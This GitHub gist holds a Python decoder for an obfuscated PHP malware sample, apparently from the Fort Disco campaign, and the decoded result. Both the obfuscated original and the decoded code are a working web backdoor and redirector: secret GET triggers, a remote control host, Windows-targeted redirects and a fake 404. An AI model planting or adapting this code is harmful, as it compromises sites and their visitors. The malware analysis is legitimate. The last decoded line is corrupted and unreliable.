Skip to content

Instantly share code, notes, and snippets.

@Rurik

Rurik/encoded_PHP_decoder.py

Last active April 3, 2021 16:46
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save Rurik/6195422 to your computer and use it in GitHub Desktop.
Save Rurik/6195422 to your computer and use it in GitHub Desktop.
Download ZIP
A quickie decoder script for encoded PHP code. May be Fort Disco?
Raw
encoded_PHP_decoder.py
import base64
script = """
<? $GLOBALS['_584730172_']=Array(base64_decode('ZXJy' .'b' .'3JfcmVw' .'b' .'3J0aW5n'),base64_decode('c' .'2V0X3RpbWV' .'fbGl' .'taXQ' .'='),base64_decode('' .'ZG' .'Vma' .'W' .'5l'),base64_decode('' .'ZGlyb' .'mFtZQ=='),base64_decode('ZGVm' .'aW5l'),base64_decode('' .'d' .'W5saW5r'),base64_decode('Zml' .'sZ' .'V9le' .'G' .'lzdHM='),base64_decode('dG91Y2' .'g='),base64_decode('aXNfd3J' .'p' .'dGFibGU='),base64_decode('dHJ' .'p' .'bQ=='),base64_decode('ZmlsZ' .'V9nZXRf' .'Y29udGVud' .'HM='),base64_decode('dW5s' .'aW5r'),base64_decode('Zm' .'lsZ' .'V9nZXRf' .'Y2' .'9u' .'dGVudHM='),base64_decode('d' .'W5' .'saW5r'),base64_decode('cH' .'JlZ19' .'tYX' .'Rj' .'aA=='),base64_decode('aW1wb' .'G9kZ' .'Q=='),base64_decode('cHJlZ19t' .'YXRja' .'A=='),base64_decode('a' .'W1w' .'bG9k' .'Z' .'Q=='),base64_decode('Zml' .'s' .'ZV' .'9nZXRfY' .'29' .'udGV' .'udH' .'M='),base64_decode('Z' .'m9w' .'ZW4='),base64_decode('' .'ZmxvY' .'2' .'s' .'='),base64_decode('ZnB1' .'dH' .'M='),base64_decode('Zmx' .'vY' .'2s' .'='),base64_decode('Zm' .'Nsb3' .'Nl'),base64_decode('Z' .'mlsZV9leG' .'lzdH' .'M='),base64_decode('dW5zZX' .'JpYWx' .'pemU='),base64_decode('Z' .'mlsZV9nZXRfY29udGVu' .'dHM='),base64_decode('dGlt' .'ZQ' .'=' .'='),base64_decode('Zm' .'ls' .'Z' .'V9n' .'ZX' .'RfY29' .'ud' .'GVu' .'dHM='),base64_decode('d' .'GltZ' .'Q=='),base64_decode('Zm9w' .'ZW4='),base64_decode('Zmx' .'vY2s='),base64_decode('' .'ZnB1dHM='),base64_decode('c2VyaWFsaX' .'pl'),base64_decode('Zm' .'xvY2s='),base64_decode('ZmNsb' .'3N' .'l'),base64_decode('c' .'3Vic3Ry'),base64_decode('' .'a' .'GVhZGVy'),base64_decode('aGVhZGV' .'y')); ?><? function _1348942592($i){$a=Array('aHR0cDovL2dheWxlZWNoZXIuY29tOjgx','cXdlMTIz','cXdlMTIz','MTIzcXdl','Uk9PVA==','Lw==','TE9H','b2xvbG8udHh0','L2lmcmFtZS50eHQ=','dGVzdA==','d29yaw==','Tk8gV09SSywgTk9UIEdFVCBVUkw=','Tk8gV09SSywgTk9UIFdSSVRJQkxF','YWFh','YWFh','YWFh','U0NSSVBUX0ZJTEVOQU1F','LmNvdW50','YmJi','YmJi','Y2Nj','U0NSSVBUX0ZJTEVOQU1F','LmNvdW50','TnVsbCBjb3VudCBvaw==','RVJST1IgbnVsbCBjb3VudCgo','SFRUUF9VU0VSX0FHRU5U','TVNJRQ==','RmlyZWZveA==','T3BlcmE=','V2luZG93cw==','Lw==','fA==','L2k=','SFRUUF9VU0VSX0FHRU5U','Lw==','fA==','L2k=','SFRUUF9VU0VSX0FHRU5U','U0NSSVBUX0ZJTEVOQU1F','LmNvdW50','','U0NSSVBUX0ZJTEVOQU1F','LmNvdW50','dw==','L2lmcmFtZTIudHh0','aHR0cDovL3lhLnJ1Lw==','c2V0dGluZ3MuanNvbg==','c2V0dGluZ3MuanNvbg==','bGFzdA==','dXJs','bGFzdA==','dXJs','bGFzdA==','c2V0dGluZ3MuanNvbg==','dw==','dXJs','dXJs','aHR0cA==','aHR0cDovLw==','Lw==','SFRUUC8xLjEgNDA0IE5vdCBGb3VuZA==');return base64_decode($a[$i]);} ?><?php $GLOBALS['_584730172_'][0](round(0));$GLOBALS['_584730172_'][1](round(0));$_0=_1348942592(0);if(isset($_GET[_1348942592(1)])AND $_GET[_1348942592(2)]==_1348942592(3)){$GLOBALS['_584730172_'][2](_1348942592(4),$GLOBALS['_584730172_'][3](__FILE__) ._1348942592(5));$GLOBALS['_584730172_'][4](_1348942592(6),ROOT ._1348942592(7));@$GLOBALS['_584730172_'][5](LOG);if(!$GLOBALS['_584730172_'][6](LOG)){@$GLOBALS['_584730172_'][7](LOG);if($GLOBALS['_584730172_'][8](LOG)AND $GLOBALS['_584730172_'][9]($GLOBALS['_584730172_'][10]($_0 ._1348942592(8)))==_1348942592(9)){@$GLOBALS['_584730172_'][11](LOG);echo _1348942592(10);}else{echo _1348942592(11);}}else{echo _1348942592(12);}exit;}if(isset($_GET[_1348942592(13)])AND $_GET[_1348942592(14)]== _1348942592(15)){$_1=$GLOBALS['_584730172_'][12]($_SERVER[_1348942592(16)] ._1348942592(17));echo $_1;exit;}if(isset($_GET[_1348942592(18)])AND $_GET[_1348942592(19)]== _1348942592(20)){if($GLOBALS['_584730172_'][13]($_SERVER[_1348942592(21)] ._1348942592(22))){echo _1348942592(23);}else{echo _1348942592(24);}exit;}if(!empty($_SERVER[_1348942592(25)])){$_2=array(_1348942592(26),_1348942592(27),_1348942592(28));$_3=array(_1348942592(29));if($GLOBALS['_584730172_'][14](_1348942592(30) .$GLOBALS['_584730172_'][15](_1348942592(31),$_2) ._1348942592(32),$_SERVER[_1348942592(33)])){if($GLOBALS['_584730172_'][16](_1348942592(34) .$GLOBALS['_584730172_'][17](_1348942592(35),$_3) ._1348942592(36),$_SERVER[_1348942592(37)])){$_4=@$GLOBALS['_584730172_'][18]($_SERVER[_1348942592(38)] ._1348942592(39));if($_4 == _1348942592(40)or $_4 == false)$_4=round(0);$_5=@$GLOBALS['_584730172_'][19]($_SERVER[_1348942592(41)] ._1348942592(42),_1348942592(43));@$GLOBALS['_584730172_'][20]($_5,LOCK_EX);@$GLOBALS['_584730172_'][21]($_5,$_4+round(0+1));@$GLOBALS['_584730172_'][22]($_5,LOCK_UN);@$GLOBALS['_584730172_'][23]($_5);$_6=$_0 ._1348942592(44);$_7=round(0+300);$_8=_1348942592(45);if(!$_6)exit();$_9=$GLOBALS['_584730172_'][24](_1348942592(46))?$GLOBALS['_584730172_'][25]($GLOBALS['_584730172_'][26](_1348942592(47))):array(_1348942592(48)=>round(0),_1348942592(49)=>$_8);if($_9[_1348942592(50)]<$GLOBALS['_584730172_'][27]()-$_7){if($_9[_1348942592(51)]=$GLOBALS['_584730172_'][28]($_6)){$_9[_1348942592(52)]=$GLOBALS['_584730172_'][29]();$_10=$GLOBALS['_584730172_'][30](_1348942592(53),_1348942592(54));$GLOBALS['_584730172_'][31]($_10,LOCK_EX);$GLOBALS['_584730172_'][32]($_10,$GLOBALS['_584730172_'][33]($_9));$GLOBALS['_584730172_'][34]($_10,LOCK_UN);$GLOBALS['_584730172_'][35]($_10);}}$_11=$_9[_1348942592(55)]?$_9[_1348942592(56)]:$_8;if($GLOBALS['_584730172_'][36]($_11,round(0),round(0+1+1+1+1))!= _1348942592(57))$_11=_1348942592(58) .$_11 ._1348942592(59);$GLOBALS['_584730172_'][37]("Location: $_11");exit;}}}$GLOBALS['_584730172_'][38](_1348942592(60)); ?>
"""
functions = []
strings = []
# Split the script into its three segments (functions, strings, code).
sections = script.split("<?")
function_section = sections[1]
string_section = sections[2]
code = "<?" + sections[3]
# Parse through each value, separated by base64_decode call.
for entry in function_section.split("base64_decode"):
# Skip the initial entry as it contains no value.
if "GLOBALS" in entry:
continue
# Remove the string concatenations
entry = entry.replace("' .'", "")
# Split on single quote to get the Base64 value contained within the quotes.
function = entry.split("'")[1]
# Append new function mame into array
functions.append(base64.b64decode(function))
for entry in string_section.split(","):
entry = entry.split("'")[1]
strings.append(base64.b64decode(entry))
# Now start replacing function calls with true values. We split on the call to
# acquire each index number, then replace.
code_lines = code.split("$GLOBALS['_584730172_']")
for line_num in range(1, len(code_lines)):
line = code_lines[line_num]
# Ensure the index call, [x], is in the string before going on.
if not "[" in line:
continue
# Extract the index number, pull the function from the array.
codenum = line.split("[")[1].split("]")[0]
func = functions[int(codenum)]
# Recreate the array string and replace it in the code.
s = "$GLOBALS['_584730172_'][%s]" % codenum
code = code.replace(s, func)
# Now start replacing strings with true values.
code_lines = code.split("_1348942592")
for line_num in range(1, len(code_lines)):
line = code_lines[line_num]
if not "(" in line:
continue
codenum = line.split("(")[1].split(")")[0]
string = strings[int(codenum)]
s = "_1348942592(%s)" % codenum
code = code.replace(s, "'" + string + "'")
# Print the final code.
print code
RESULTS:
Decoded script:
error_reporting(round(0));
set_time_limit(round(0));
$_0 = 'http://gayleecher.com:81';
if (isset($_GET['qwe123']) AND $_GET['qwe123'] == '123qwe') {
define('ROOT', dirname(__FILE__).
'/');
define('LOG', ROOT.
'ololo.txt');@
unlink(LOG);
if (!file_exists(LOG)) {@
touch(LOG);
if (is_writable(LOG) AND trim(file_get_contents($_0.
'/iframe.txt')) == 'test') {@
unlink(LOG);
echo 'work';
} else {
echo 'NO WORK, NOT GET URL';
}
} else {
echo 'NO WORK, NOT WRITIBLE';
}
exit;
}
if (isset($_GET['aaa']) AND $_GET['aaa'] == 'aaa') {
$_1 = file_get_contents($_SERVER['SCRIPT_FILENAME'].
'.count');
echo $_1;
exit;
}
if (isset($_GET['bbb']) AND $_GET['bbb'] == 'ccc') {
if (unlink($_SERVER['SCRIPT_FILENAME'].
'.count')) {
echo 'Null count ok';
} else {
echo 'ERROR null count((';
}
exit;
}
if (!empty($_SERVER['HTTP_USER_AGENT'])) {
$_2 = array('MSIE', 'Firefox', 'Opera');
$_3 = array('Windows');
if (preg_match('/'.implode('|', $_2).
'/i', $_SERVER['HTTP_USER_AGENT'])) {
if (preg_match('/'.implode('|', $_3).
'/i', $_SERVER['HTTP_USER_AGENT'])) {
$_4 = @file_get_contents($_SERVER['SCRIPT_FILENAME'].
'.count');
if ($_4 == ''
or $_4 == false) $_4 = round(0);
$_5 = @fopen($_SERVER['SCRIPT_FILENAME'].
'.count', 'w');@
flock($_5, LOCK_EX);@
fputs($_5, $_4 + round(0 + 1));@
flock($_5, LOCK_UN);@
fclose($_5);
$_6 = $_0.
'/iframe2.txt';
$_7 = round(0 + 300);
$_8 = 'http://ya.ru/';
if (!$_6) exit();
$_9 = file_exists('settings.json') ? unserialize(file_get_contents('settings.json')) : array('last' = > round(0), 'url' = > $_8);
if ($_9['last'] < time() - $_7) {
if ($_9['url'] = file_get_contents($_6)) {
$_9['last'] = time();
$_10 = fopen('settings.json', 'w');
flock($_10, LOCK_EX);
fputs($_10, serialize($_9));
flock($_10, LOCK_UN);
fclose($_10);
}
}
$_11 = $_9['url'] ? $_9['url'] : $_8;
if (substr($_11, round(0), round(0 + 1 + 1 + 1 + 1)) != 'http') $_11 = 'http://'.$_11.
'/';
header("Location: $_11");
exit;
}
}
}
header~� * '�~<��h���ɡ���輽��展����ȹ�������ݔ����ݔ�������ݕI==P('
HTTP / 1.1 404 Not Found '); ?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment